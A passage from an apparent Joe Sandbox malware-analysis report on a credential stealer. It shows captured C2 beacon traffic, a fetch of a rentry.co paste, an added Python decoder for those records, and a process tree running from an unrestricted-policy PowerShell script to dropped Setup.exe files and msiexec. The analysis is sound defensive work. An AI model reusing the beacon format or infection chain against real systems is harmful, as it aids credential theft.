Data Ascii: act=get_message&ver=4.0&lid=MeHdy4--pl8vs07&j=&hwid=36A53A0ACE1B87A3169428F99DFB47D9
2024-11-29 14:46:27 UTC | 1013 | IN | HTTP/1.1 200 OK
Date: Fri, 29 Nov 2024 14:46:27 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=gr6i6tqoehr8agmniupbqap4rv; expires=Tue, 25-Mar-2025 08:33:04 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=UqfqBIPDNFT3mZW1d1BWifhr6nnWEHv1URmmWKPMw3ssk0dup6rHFJytCoI1l8mZguigpLjJdZueS2nYCtuU1hoeQZHvroOEAMtpeA5rRJdjCzAZ0pAoKKWKxqavWEbaJZ%2BElFI%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8ea363151e6242b7-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=2314&min_rtt=1783&rtt_var=1048&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2844&recv_bytes=986&delivery_rate=1637689&cwnd=225&unsent_bytes=0&cid=42ef3ef6154e3e40&ts=2794&x=0"
2024-11-29 14:46:27 UTC | 126 | IN | Data Raw: 37 38 0d 0a 4d 6b 35 57 65 6b 50 71 64 69 78 33 6b 44 51 33 6a 79 6e 2f 36 66 4e 59 45 4e 79 71 69 52 4c 7a 39 64 70 64 6f 4e 39 59 2b 55 74 70 4e 58 51 50 59 64 42 55 52 41 50 6b 52 45 53 31 64 64 43 31 33 43 70 31 73 74 37 37 61 39 32 57 74 51 47 50 75 54 32 57 50 6c 63 35 4d 30 38 66 78 51 52 4e 41 4c 49 59 46 65 6c 64 33 64 50 42 64 44 4b 35 69 4c 4d 69 6a 71 67 3d 0d 0a
Data Ascii: 78Mk5WekPqdix3kDQ3jyn/6fNYENyqiRLz9dpdoN9Y+UtpNXQPYdBURAPkRES1ddC13Cp1st77a92WtQGPuT2WPlc5M08fxQRNALIYFeld3dPBdDK5iLMijqg=
2024-11-29 14:46:27 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP   | Source Port | Destination IP | Destination Port | PID  | Process
8          | 192.168.2.4 | 49806       | 104.26.2.16    | 443              | 5544 | C:\Windows\SysWOW64\msiexec.exe

Timestamp | Bytes transferred | Direction | Data
2024-11-29 14:46:29 UTC | 196 | OUT | GET /feouewe5/raw HTTP/1.1
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Host: rentry.co
2024-11-29 14:46:29 UTC | 1279 | IN | HTTP/1.1 403 Forbidden
Date: Fri, 29 Nov 2024 14:46:29 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 8793
Connection: close
Accept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
Critical-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
Cross-Origin-Embedder-Policy: require-corp
Cross-Origin-Opener-Policy: same-origin
Cross-Origin-Resource-Policy: same-origin
Origin-Agent-Cluster: ?1
Permissions-Policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
Referrer-Policy: same-origin
X-Content-Options: nosniff
X-Frame-Options: SAMEORIGIN
cf-mitigated: challenge
                                                                                                                                                                                                          2024-11-29 14:46:29 UTC917INData Raw: 63 66 2d 63 68 6c 2d 6f 75 74 3a 20 77 4e 50 67 57 68 72 52 4f 39 41 44 64 53 56 48 44 59 51 46 61 74 76 4f 6a 39 45 5a 37 6e 34 74 66 31 45 7a 42 6f 6c 2b 2f 2b 73 62 6a 73 62 56 48 51 4f 47 6b 4c 69 79 33 50 53 35 4a 69 59 2b 56 36 36 46 65 4e 59 6f 6d 34 77 62 5a 4f 50 47 37 39 30 63 61 6a 75 57 49 32 2b 4c 4e 49 58 79 51 42 32 2b 70 4e 2f 61 32 71 6c 4f 78 2b 6a 79 32 45 53 4f 6e 34 59 74 53 72 35 59 49 33 75 4e 77 47 37 2b 4a 72 70 36 6e 67 47 41 48 44 37 53 66 6f 4b 33 51 77 3d 3d 24 59 51 39 73 6b 33 45 78 41 66 55 65 49 4d 68 37 6b 71 45 4c 52 67 3d 3d 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 70 72 69 76 61 74 65 2c 20 6d 61 78 2d 61 67 65 3d 30 2c 20 6e 6f 2d 73 74 6f 72 65 2c 20 6e 6f 2d 63 61 63 68 65 2c 20 6d 75 73 74 2d 72 65 76 61
                                                                                                                                                                                                          Data Ascii: cf-chl-out: wNPgWhrRO9ADdSVHDYQFatvOj9EZ7n4tf1EzBol+/+sbjsbVHQOGkLiy3PS5JiY+V66FeNYom4wbZOPG790cajuWI2+LNIXyQB2+pN/a2qlOx+jy2ESOn4YtSr5YI3uNwG7+Jrp6ngGAHD7SfoK3Qw==$YQ9sk3ExAfUeIMh7kqELRg==Cache-Control: private, max-age=0, no-store, no-cache, must-reva
                                                                                                                                                                                                          2024-11-29 14:46:29 UTC542INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 4a 75 73 74 20 61 20 6d 6f 6d 65 6e 74 2e 2e 2e 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 6e 6f 66 6f 6c 6c 6f 77 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70
                                                                                                                                                                                                          Data Ascii: <!DOCTYPE html><html lang="en-US"><head><title>Just a moment...</title><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=Edge"><meta name="robots" content="noindex,nofollow"><meta name="viewp
                                                                                                                                                                                                          2024-11-29 14:46:29 UTC1369INData Raw: 6c 6f 72 20 45 6d 6f 6a 69 2c 53 65 67 6f 65 20 55 49 20 45 6d 6f 6a 69 2c 53 65 67 6f 65 20 55 49 20 53 79 6d 62 6f 6c 2c 4e 6f 74 6f 20 43 6f 6c 6f 72 20 45 6d 6f 6a 69 7d 62 6f 64 79 7b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 63 6f 6c 75 6d 6e 3b 68 65 69 67 68 74 3a 31 30 30 76 68 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 76 68 7d 2e 6d 61 69 6e 2d 63 6f 6e 74 65 6e 74 7b 6d 61 72 67 69 6e 3a 38 72 65 6d 20 61 75 74 6f 3b 6d 61 78 2d 77 69 64 74 68 3a 36 30 72 65 6d 3b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 31 2e 35 72 65 6d 7d 40 6d 65 64 69 61 20 28 77 69 64 74 68 20 3c 3d 20 37 32 30 70 78 29 7b 2e 6d 61 69 6e 2d 63 6f 6e 74 65 6e 74 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 34 72 65 6d 7d 7d 2e 68 32 7b 66
                                                                                                                                                                                                          Data Ascii: lor Emoji,Segoe UI Emoji,Segoe UI Symbol,Noto Color Emoji}body{display:flex;flex-direction:column;height:100vh;min-height:100vh}.main-content{margin:8rem auto;max-width:60rem;padding-left:1.5rem}@media (width <= 720px){.main-content{margin-top:4rem}}.h2{f
                                                                                                                                                                                                          2024-11-29 14:46:29 UTC1369INData Raw: 64 20 63 6f 6f 6b 69 65 73 20 74 6f 20 63 6f 6e 74 69 6e 75 65 3c 2f 73 70 61 6e 3e 3c 2f 64 69 76 3e 3c 2f 6e 6f 73 63 72 69 70 74 3e 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 3d 7b 63 76 49 64 3a 20 27 33 27 2c 63 5a 6f 6e 65 3a 20 22 72 65 6e 74 72 79 2e 63 6f 22 2c 63 54 79 70 65 3a 20 27 6d 61 6e 61 67 65 64 27 2c 63 52 61 79 3a 20 27 38 65 61 33 36 33 33 31 61 61 35 37 34 32 62 32 27 2c 63 48 3a 20 27 6d 77 51 62 47 2e 74 38 47 72 72 57 4d 47 75 79 75 51 67 79 52 57 78 62 79 5f 53 79 4c 65 30 78 4e 5f 63 37 33 32 74 52 41 69 49 2d 31 37 33 32 38 39 31 35 38 39 2d 31 2e 32 2e 31 2e 31 2d 45 7a 45 4a 77 5f 45 53 7a 79 36 73 4a 33 2e 41 6a 6b 30
                                                                                                                                                                                                          Data Ascii: d cookies to continue</span></div></noscript></div></div><script>(function(){window._cf_chl_opt={cvId: '3',cZone: "rentry.co",cType: 'managed',cRay: '8ea36331aa5742b2',cH: 'mwQbG.t8GrrWMGuyuQgyRWxby_SyLe0xN_c732tRAiI-1732891589-1.2.1.1-EzEJw_ESzy6sJ3.Ajk0
                                                                                                                                                                                                          2024-11-29 14:46:29 UTC1369INData Raw: 6c 6e 33 41 41 6b 77 30 62 63 78 70 36 63 72 67 66 4a 37 52 72 64 55 48 57 59 5f 6d 76 35 6a 68 5a 79 73 4d 4c 65 71 53 58 55 37 48 55 77 6a 77 5a 4b 44 6d 78 7a 2e 58 62 34 2e 7a 4c 6a 50 64 66 4e 45 58 6a 4b 36 79 6f 43 56 31 49 45 7a 48 69 6f 55 4f 52 71 2e 61 61 64 46 33 69 75 46 50 4d 77 35 51 7a 63 43 51 51 6a 57 42 51 45 4b 4f 59 50 75 6b 77 5a 48 6f 5f 4f 47 36 52 44 4f 59 70 57 66 43 61 34 31 63 6f 42 4d 48 66 38 63 63 45 46 76 42 4e 50 42 4b 41 44 45 79 76 70 6d 65 38 34 75 37 59 75 45 64 74 54 5a 6a 35 48 67 4b 61 32 70 41 57 72 2e 6a 61 47 45 49 42 55 78 4d 5f 37 48 56 6a 43 6d 2e 57 30 35 37 66 59 73 36 49 6f 48 62 52 31 46 48 52 45 4b 35 4d 66 5f 31 5a 6c 6d 47 59 46 36 46 47 63 74 6d 63 53 7a 6f 34 32 47 72 57 6d 34 42 45 72 7a 56 69 35 6a
                                                                                                                                                                                                          Data Ascii: ln3AAkw0bcxp6crgfJ7RrdUHWY_mv5jhZysMLeqSXU7HUwjwZKDmxz.Xb4.zLjPdfNEXjK6yoCV1IEzHioUORq.aadF3iuFPMw5QzcCQQjWBQEKOYPukwZHo_OG6RDOYpWfCa41coBMHf8ccEFvBNPBKADEyvpme84u7YuEdtTZj5HgKa2pAWr.jaGEIBUxM_7HVjCm.W057fYs6IoHbR1FHREK5Mf_1ZlmGYF6FGctmcSzo42GrWm4BErzVi5j
                                                                                                                                                                                                          2024-11-29 14:46:29 UTC1369INData Raw: 74 57 2e 79 6d 62 66 5f 49 2e 6a 4f 51 44 4d 2e 45 6c 6c 6b 5a 78 42 54 36 4f 78 73 56 7a 78 6c 5f 55 66 74 31 75 6d 42 79 4a 59 51 69 65 55 69 47 48 31 44 5f 64 48 72 33 57 79 4b 6d 48 65 4a 53 6c 69 79 72 30 4b 70 38 71 37 6e 55 6c 75 61 4c 61 4b 4c 69 43 77 42 74 7a 64 45 48 46 59 4f 78 52 47 65 4a 5a 38 51 44 4c 63 47 5f 31 30 58 46 4c 4c 6f 57 49 69 50 2e 78 4c 71 7a 35 2e 31 62 71 71 61 36 79 50 77 52 36 6f 57 48 64 37 56 42 66 4f 72 79 44 4a 66 31 5a 44 42 39 36 58 6d 68 6a 42 46 47 74 67 76 5a 4b 34 73 32 62 31 66 6e 2e 2e 58 77 54 33 46 4f 55 50 34 53 55 44 74 6a 52 52 41 6d 47 73 56 62 6f 71 44 70 58 32 78 69 55 56 48 76 44 36 48 31 68 53 6e 63 59 55 4d 48 2e 42 6a 62 79 30 71 67 64 43 47 7a 38 50 42 31 56 66 78 47 56 51 33 54 37 6f 43 35 79 31
                                                                                                                                                                                                          Data Ascii: tW.ymbf_I.jOQDM.EllkZxBT6OxsVzxl_Uft1umByJYQieUiGH1D_dHr3WyKmHeJSliyr0Kp8q7nUluaLaKLiCwBtzdEHFYOxRGeJZ8QDLcG_10XFLLoWIiP.xLqz5.1bqqa6yPwR6oWHd7VBfOryDJf1ZDB96XmhjBFGtgvZK4s2b1fn..XwT3FOUP4SUDtjRRAmGsVboqDpX2xiUVHvD6H1hSncYUMH.Bjby0qgdCGz8PB1VfxGVQ3T7oC5y1
                                                                                                                                                                                                          2024-11-29 14:46:29 UTC1369INData Raw: 37 75 79 6c 38 33 4b 77 53 53 4f 6f 6c 64 7a 6b 32 31 52 37 33 45 6f 77 59 34 76 4a 4c 76 77 50 43 47 54 77 72 75 6a 67 6e 63 4f 78 42 2e 71 30 70 69 68 6c 46 76 6a 46 62 68 44 32 6e 70 57 56 70 31 6a 4a 35 41 4d 71 37 32 72 58 69 73 56 52 47 56 2e 79 6c 69 79 76 33 48 79 43 4f 4f 58 50 31 37 44 51 66 31 56 75 67 77 67 61 6d 75 78 4d 45 56 56 63 6e 36 35 65 4c 72 5a 61 39 48 48 61 48 37 42 46 38 4e 35 70 6e 56 6f 59 53 68 41 4d 52 52 56 34 46 73 74 5a 70 68 53 52 6a 35 4e 4e 2e 2e 41 79 64 69 39 4d 51 65 6a 49 4b 4e 6c 68 56 63 74 79 50 6e 55 6e 6f 2e 34 64 6a 36 43 68 48 68 55 75 39 6e 76 57 57 76 5f 32 34 6f 72 31 36 45 43 6a 57 67 44 57 56 34 34 65 7a 4c 5a 69 76 68 4e 49 52 33 48 4d 65 67 43 6d 35 34 34 65 30 4b 6f 37 4e 6e 39 66 53 62 4c 6e 49 33 37
                                                                                                                                                                                                          Data Ascii: 7uyl83KwSSOoldzk21R73EowY4vJLvwPCGTwrujgncOxB.q0pihlFvjFbhD2npWVp1jJ5AMq72rXisVRGV.yliyv3HyCOOXP17DQf1VugwgamuxMEVVcn65eLrZa9HHaH7BF8N5pnVoYShAMRRV4FstZphSRj5NN..Aydi9MQejIKNlhVctyPnUno.4dj6ChHhUu9nvWWv_24or16ECjWgDWV44ezLZivhNIR3HMegCm544e0Ko7Nn9fSbLnI37
                                                                                                                                                                                                          2024-11-29 14:46:29 UTC1369INData Raw: 68 45 34 37 51 5f 6b 42 75 54 75 6b 53 67 6d 51 30 63 36 76 56 53 2e 49 32 6f 38 54 4d 46 35 67 76 39 44 68 4f 41 5a 61 39 46 77 47 76 73 72 44 4c 35 6d 55 34 4b 7a 69 64 4a 64 72 62 33 6f 41 47 48 6c 37 44 77 5f 6b 48 49 75 57 49 53 62 53 51 71 44 78 7a 73 32 34 4a 74 6f 2e 42 44 74 4f 39 6d 66 61 73 52 76 44 35 50 78 62 57 69 74 44 30 77 6f 44 77 57 33 63 37 33 31 6b 67 55 78 2e 70 75 76 37 53 33 61 45 57 67 32 74 34 71 47 2e 4a 4a 2e 63 55 5a 56 52 61 44 65 2e 52 58 4c 66 38 65 46 73 52 63 76 35 57 67 52 64 74 30 79 45 70 37 41 36 35 64 6d 79 5f 75 67 30 33 37 4c 78 41 61 58 58 55 59 31 49 66 72 33 6b 59 35 54 7a 77 77 44 56 36 67 4a 67 4e 71 51 5f 34 67 64 35 51 74 50 4a 57 48 32 74 6a 46 70 30 78 48 79 6b 68 57 38 54 77 6f 75 30 67 33 38 4d 4c 77 41
                                                                                                                                                                                                          Data Ascii: hE47Q_kBuTukSgmQ0c6vVS.I2o8TMF5gv9DhOAZa9FwGvsrDL5mU4KzidJdrb3oAGHl7Dw_kHIuWISbSQqDxzs24Jto.BDtO9mfasRvD5PxbWitD0woDwW3c731kgUx.puv7S3aEWg2t4qG.JJ.cUZVRaDe.RXLf8eFsRcv5WgRdt0yEp7A65dmy_ug037LxAaXXUY1Ifr3kY5TzwwDV6gJgNqQ_4gd5QtPJWH2tjFp0xHykhW8Twou0g38MLwA
                                                                                                                                                                                                          2024-11-29 14:46:29 UTC37INData Raw: 69 6c 64 28 63 70 6f 29 3b 7d 28 29 29 3b 3c 2f 73 63 72 69 70 74 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                                                                                                          Data Ascii: ild(cpo);}());</script></body></html>
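The session 7 beacon and the session 8 paste fetch above, decoded and classified. This is an added example for this report, not Joe Sandbox tooling and not LummaC code. The hex constants are copied from the "Data Raw" records above, RENTRY_HEAD is a copied subset of the session 8 response headers, and the beacon heuristic (act=get_message together with ver, lid and a 32-hex-character hwid) is an assumption drawn from this single capture rather than a vendor signature.

```python
"""Decode the session 7 / session 8 records above and classify them.

Added example for this report; not Joe Sandbox or LummaC code.  Hex records
are copied from the 'Data Raw' fields, RENTRY_HEAD is a copied subset of the
session 8 headers, and the beacon heuristic is an assumption from this capture.
"""
import base64
from urllib.parse import parse_qs

# Session 7, POST /api to balloon-sneak.cyou: the 84-byte form body (copied).
POST_BODY_HEX = (
    "61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 "
    "26 6c 69 64 3d 4d 65 48 64 79 34 2d 2d 70 6c 38 76 73 30 37 26 6a 3d "
    "26 68 77 69 64 3d 33 36 41 35 33 41 30 41 43 45 31 42 38 37 41 33 31 "
    "36 39 34 32 38 46 39 39 44 46 42 34 37 44 39"
)

# Session 7, 200 OK reply: both chunked-body records (126 + 5 bytes), concatenated.
RESPONSE_BODY_HEX = (
    "37 38 0d 0a 4d 6b 35 57 65 6b 50 71 64 69 78 33 6b 44 51 33 6a 79 6e "
    "2f 36 66 4e 59 45 4e 79 71 69 52 4c 7a 39 64 70 64 6f 4e 39 59 2b 55 "
    "74 70 4e 58 51 50 59 64 42 55 52 41 50 6b 52 45 53 31 64 64 43 31 33 "
    "43 70 31 73 74 37 37 61 39 32 57 74 51 47 50 75 54 32 57 50 6c 63 35 "
    "4d 30 38 66 78 51 52 4e 41 4c 49 59 46 65 6c 64 33 64 50 42 64 44 4b "
    "35 69 4c 4d 69 6a 71 67 3d 0d 0a "
    "30 0d 0a 0d 0a"
)

# Session 8, GET /feouewe5/raw on rentry.co: subset of the 403 response head (copied).
RENTRY_HEAD = (
    "HTTP/1.1 403 Forbidden\r\n"
    "Date: Fri, 29 Nov 2024 14:46:29 GMT\r\n"
    "Content-Type: text/html; charset=UTF-8\r\n"
    "Content-Length: 8793\r\n"
    "Connection: close\r\n"
    "cf-mitigated: challenge\r\n"
    "\r\n"
)


def raw_to_bytes(record: str) -> bytes:
    """Convert a Joe Sandbox 'Data Raw' hex record into bytes."""
    return bytes.fromhex(record.replace(" ", ""))


def parse_form_body(body: bytes) -> dict:
    """Decode an application/x-www-form-urlencoded body; empty fields (j=) are kept."""
    pairs = parse_qs(body.decode("ascii"), keep_blank_values=True)
    return {key: values[0] for key, values in pairs.items()}


def is_lumma_style_beacon(fields: dict) -> bool:
    """Heuristic (assumption from this capture, not a vendor signature):
    act=get_message plus ver, lid and a 32-uppercase-hex hwid."""
    hwid = fields.get("hwid", "")
    return (
        fields.get("act") == "get_message"
        and "ver" in fields
        and "lid" in fields
        and len(hwid) == 32
        and all(c in "0123456789ABCDEF" for c in hwid)
    )


def dechunk(body: bytes) -> bytes:
    """Reassemble an HTTP/1.1 chunked transfer-encoded body."""
    out = bytearray()
    pos = 0
    while True:
        eol = body.index(b"\r\n", pos)
        size = int(body[pos:eol].split(b";")[0], 16)  # drop chunk extensions
        pos = eol + 2
        if size == 0:  # last-chunk marker
            break
        out += body[pos:pos + size]
        pos += size + 2  # skip the CRLF that terminates this chunk
    return bytes(out)


def decode_c2_reply(hex_record: str) -> bytes:
    """Dechunk and base64-decode the reply.  The result is opaque: the report
    does not identify the cipher, so nothing beyond its length is inferred."""
    return base64.b64decode(dechunk(raw_to_bytes(hex_record)))


def cloudflare_challenged(head: str) -> bool:
    """True when a fetch got a Cloudflare managed challenge (403 plus
    cf-mitigated: challenge) instead of content, as rentry.co returned."""
    lines = head.split("\r\n")
    is_403 = lines[0].split(" ")[1:2] == ["403"]
    headers = {}
    for line in lines[1:]:
        if ":" in line:
            name, value = line.split(":", 1)
            headers[name.strip().lower()] = value.strip()
    return is_403 and headers.get("cf-mitigated") == "challenge"


if __name__ == "__main__":
    fields = parse_form_body(raw_to_bytes(POST_BODY_HEX))
    print("beacon fields:", fields, "lumma-style:", is_lumma_style_beacon(fields))
    print("reply plaintext length:", len(decode_c2_reply(RESPONSE_BODY_HEX)))
    print("rentry.co fetch challenged:", cloudflare_challenged(RENTRY_HEAD))
```

Run directly, the script reports the parsed beacon fields (act, ver, lid, j, hwid), the 89-byte length of the base64-decoded reply, and that the rentry.co request was answered with a Cloudflare managed challenge rather than the paste, which is why no follow-on payload from that URL is observed in this capture.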


                                                                                                                                                                                                          Target ID:0
                                                                                                                                                                                                          Start time:09:44:59
                                                                                                                                                                                                          Start date:29/11/2024
                                                                                                                                                                                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                          Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\bUAmCazc.ps1"
                                                                                                                                                                                                          Imagebase:0x7ff788560000
                                                                                                                                                                                                          File size:452'608 bytes
                                                                                                                                                                                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                          Reputation:high
                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                          Target ID:1
                                                                                                                                                                                                          Start time:09:44:59
                                                                                                                                                                                                          Start date:29/11/2024
                                                                                                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                          Imagebase:0x7ff7699e0000
                                                                                                                                                                                                          File size:862'208 bytes
                                                                                                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                          Reputation:high
                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                          Target ID:3
                                                                                                                                                                                                          Start time:09:45:18
                                                                                                                                                                                                          Start date:29/11/2024
                                                                                                                                                                                                          Path:C:\Users\user\AppData\Roaming\FeGIPCnK\Setup.exe
                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                          Commandline:"C:\Users\user\AppData\Roaming\FeGIPCnK\Setup.exe"
                                                                                                                                                                                                          Imagebase:0x400000
                                                                                                                                                                                                          File size:29'152 bytes
                                                                                                                                                                                                          MD5 hash:B6F6C3C38568EE26F1AC70411A822405
                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                          Antivirus matches:
                                                                                                                                                                                                          • Detection: 0%, ReversingLabs
                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                          Target ID:6
                                                                                                                                                                                                          Start time:09:45:24
                                                                                                                                                                                                          Start date:29/11/2024
                                                                                                                                                                                                          Path:C:\Users\user\AppData\Roaming\Driver\MNCVUBXYFIKB\Setup.exe
                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                          Commandline:C:\Users\user\AppData\Roaming\Driver\MNCVUBXYFIKB\Setup.exe
                                                                                                                                                                                                          Imagebase:0x7ff764a10000
                                                                                                                                                                                                          File size:291'968 bytes
                                                                                                                                                                                                          MD5 hash:7FB44C5BCA4226D8AAB7398E836807A2
                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                          Antivirus matches:
                                                                                                                                                                                                          • Detection: 0%, ReversingLabs
                                                                                                                                                                                                          Reputation:moderate
                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                          Target ID:7
                                                                                                                                                                                                          Start time:09:45:24
                                                                                                                                                                                                          Start date:29/11/2024
                                                                                                                                                                                                          Path:C:\Windows\SysWOW64\more.com
                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                          Commandline:C:\Windows\SysWOW64\more.com
                                                                                                                                                                                                          Imagebase:0x520000
                                                                                                                                                                                                          File size:24'576 bytes
                                                                                                                                                                                                          MD5 hash:03805AE7E8CBC07840108F5C80CF4973
                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                          Reputation:moderate
                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                          Target ID:8
                                                                                                                                                                                                          Start time:09:45:24
                                                                                                                                                                                                          Start date:29/11/2024
                                                                                                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                          Imagebase:0x7ff7699e0000
                                                                                                                                                                                                          File size:862'208 bytes
                                                                                                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                          Reputation:high
                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                          Target ID:9
                                                                                                                                                                                                          Start time:09:45:38
                                                                                                                                                                                                          Start date:29/11/2024
                                                                                                                                                                                                          Path:C:\Windows\System32\rundll32.exe
                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                          Commandline:C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
                                                                                                                                                                                                          Imagebase:0x7ff6fd560000
                                                                                                                                                                                                          File size:71'680 bytes
                                                                                                                                                                                                          MD5 hash:EF3179D498793BF4234F708D3BE28633
                                                                                                                                                                                                          Has elevated privileges:false
                                                                                                                                                                                                          Has administrator privileges:false
                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                          Reputation:high
                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                          Target ID:11
                                                                                                                                                                                                          Start time:09:45:39
                                                                                                                                                                                                          Start date:29/11/2024
                                                                                                                                                                                                          Path:C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                          Commandline:C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                                                          Imagebase:0x4c0000
                                                                                                                                                                                                          File size:59'904 bytes
                                                                                                                                                                                                          MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                          Yara matches:
                                                                                                                                                                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000B.00000003.2399976992.0000000003406000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                          Reputation:high
                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                          Target ID:12
                                                                                                                                                                                                          Start time:09:45:46
                                                                                                                                                                                                          Start date:29/11/2024
